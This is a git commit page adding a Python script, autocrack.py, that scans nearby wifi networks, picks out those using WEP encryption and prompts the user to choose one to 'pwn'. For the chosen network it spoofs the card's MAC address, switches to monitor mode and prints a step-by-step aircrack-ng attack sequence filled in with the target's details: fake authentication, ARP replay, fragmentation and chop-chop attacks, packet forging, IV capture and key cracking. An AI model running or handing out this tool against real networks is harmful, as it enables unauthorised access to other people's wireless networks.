diff options
author | Jason A. Donenfeld <Jason@zx2c4.com> | 2011-06-03 18:48:18 -0400 |
---|---|---|
committer | Jason A. Donenfeld <Jason@zx2c4.com> | 2011-06-03 18:48:18 -0400 |
commit | be6aff4b558174a5cc695b44854612114444775c (patch) | |
tree | 2139a265ab227e70b884cc7fc1d757af40c2c180 /autocrack.py | |
download | WEPAutoCrack-be6aff4b558174a5cc695b44854612114444775c.tar.xz WEPAutoCrack-be6aff4b558174a5cc695b44854612114444775c.zip |
Initial commit.
Diffstat (limited to 'autocrack.py')
-rwxr-xr-x | autocrack.py | 212 |
1 files changed, 212 insertions, 0 deletions
diff --git a/autocrack.py b/autocrack.py new file mode 100755 index 0000000..c1a0a29 --- /dev/null +++ b/autocrack.py @@ -0,0 +1,212 @@ +#!/usr/bin/env python + +import sys +import subprocess +import os + +def get_name(cell): + return matching_line(cell, "ESSID:")[1:-1] + +def get_quality(cell): + quality = matching_line(cell, "Quality=").split()[0].split('/') + return str(int(round(float(quality[0]) / float(quality[1]) * 100))).rjust(3) + " %" + +def get_channel(cell): + return matching_line(cell, "Channel:") + +def get_encryption(cell): + enc = "" + if matching_line(cell, "Encryption key:") == "off": + enc = "Open" + else: + for line in cell: + matching = match(line, "IE:") + if matching != None: + wpa = match(matching, "WPA Version ") + if wpa != None: + enc = "WPA v." + wpa + if enc == "": + enc = "WEP" + return enc + +def get_address(cell): + return matching_line(cell, "Address: ") + +rules = {"Name":get_name, + "Quality": get_quality, + "Channel": get_channel, + "Encryption": get_encryption, + "Address": get_address + } + +def sort_cells(cells): + sortby = "Quality" + reverse = True + cells.sort(None, lambda el: el[sortby], reverse) + +columns = ["#", "Name", "Address", "Quality", "Channel", "Encryption"] + +def matching_line(lines, keyword): + for line in lines: + matching = match(line,keyword) + if matching != None: + return matching + return None + +def match(line,keyword): + line = line.lstrip() + length = len(keyword) + if line[:length] == keyword: + return line[length:] + else: + return None + +def parse_cell(cell): + parsed_cell = {} + for key in rules: + rule = rules[key] + parsed_cell.update({ key: rule(cell) }) + return parsed_cell + +def print_table(table): + widths=map(max, map(lambda l:map(len, l), zip(*table))) + + justified_table = [] + for line in table: + justified_line = [] + for i, el in enumerate(line): + justified_line.append(el.ljust(widths[i] + 2)) + justified_table.append(justified_line) + + for line in justified_table: + for el in line: + print el, + print + +def print_cells(cells): + table = [columns] + counter = 1 + for cell in cells: + cell_properties=[] + for column in columns: + if column == '#': + cell_properties.append(str(counter)) + else: + cell_properties.append(cell[column]) + table.append(cell_properties) + counter += 1 + print_table(table) + +def pwn(interface, network): + print "[+] Shutting down services" + os.system("/etc/init.d/wpa_supplicant stop") + os.system("/etc/init.d/dhcpcd stop") + os.system("/etc/init.d/avahi-daemon stop") + print "[+] Acquiring MAC address:", + f = open("/sys/class/net/%s/address" % interface, "r") + realMac = f.read().strip().upper() + f.close() + print realMac + print "[+] Setting fake MAC address" + os.system("ifconfig %s down" % interface) + os.system("macchanger -r %s" % interface) + f = open("/sys/class/net/%s/address" % interface, "r") + mac = f.read().strip().upper() + f.close() + print "[+] Setting wireless card to channel %s" % network["Channel"] + os.system("iwconfig %s mode managed" % interface) + os.system("ifconfig %s up" % interface) + os.system("iwconfig %s channel %s" % (interface, network["Channel"])) + os.system("ifconfig %s down" % interface) + os.system("iwconfig %s mode monitor" % interface) + os.system("ifconfig %s up" % interface) + os.system("iwconfig %s" % interface) + + instructions = """ +== Get Deauthetication Packets (Fake Authentication) == +aireplay-ng -1 0 -e NAME -a BSSID -h MAC INTERFACE +OR +aireplay-ng -1 6000 -o 1 -q 10 -e NAME -a BSSID -h MAC INTERFACE + +== Request ARP Packets == +aireplay-ng -3 -b BSSID -h MAC INTERFACE +* if successful move to capture IVs + +== Fragmentation Attack (if requesting ARPs didn't work - no users on network) == +aireplay-ng -5 -b BSSID -h MAC INTERFACE +* use this packet? yes + +== Chop-Chop Attach (if fragmentation fails) == +aireplay-ng -4 -b BSSID -h MAC INTERFACE +* use this packet? yes + +== Construct ARP Packet == +packetforge-ng -0 -a BSSID -h MAC -k 255.255.255.255 -l 255.255.255.255 -y fragment-*.xor -w arp-request +* k source, l destination - change for persnikittiness + +== Capture IVs == +airodump-ng -c CHANNEL --bssid BSSID -w output INTERFACE + +== Inject Constructed ARP (if fragmentation or chop-chop) == +aireplay-ng -2 -r arp-request INTERFACE +* use this packet? yes + +== Analyze == +aircrack-ng -z -b BSSID output*.cap +""" + + instructions = instructions.replace("NAME", network["Name"]).replace("BSSID", network["Address"]).replace("MAC", mac).replace("INTERFACE", interface).replace("CHANNEL", network["Channel"]) + proc = subprocess.Popen("less", stdin=subprocess.PIPE) + proc.communicate(input=instructions) + proc.wait() + + print "[+] Restoring wifi card" + os.system("ifconfig %s down" % interface) + os.system("macchanger -m %s %s" % (realMac, interface)) + os.system("iwconfig %s mode managed" % interface) + os.system("ifconfig %s up" % interface) + print "[+] Starting stopped services" + os.system("/etc/init.d/wpa_supplicant start") + os.system("/etc/init.d/dhcpcd start") + os.system("/etc/init.d/avahi-daemon start") + +def main(): + if len(sys.argv) != 2: + print "You must supply the wifi card name as an argument." + return + if os.getuid() != 0: + print "You must be root." + return + + print "[+] Scanning..." + proc = subprocess.Popen(["iwlist", sys.argv[1], "scanning"], stdout=subprocess.PIPE) + cells=[[]] + parsed_cells=[] + for line in proc.stdout: + cell_line = match(line, "Cell ") + if cell_line != None: + cells.append([]) + line = cell_line[-27:] + cells[-1].append(line.rstrip()) + cells = cells[1:] + for cell in cells: + parsed_cells.append(parse_cell(cell)) + sort_cells(parsed_cells) + encrypted_cells = [] + for cell in parsed_cells: + if cell["Encryption"] == "WEP": + encrypted_cells.append(cell) + + print_cells(encrypted_cells) + print + try: + network = int(raw_input("Which network would you like to pwn? [1-%s] " % len(encrypted_cells))) + except: + network = -1 + + if network > len(encrypted_cells) or network < 1: + return + + pwn(sys.argv[1], encrypted_cells[network - 1]) + +main() |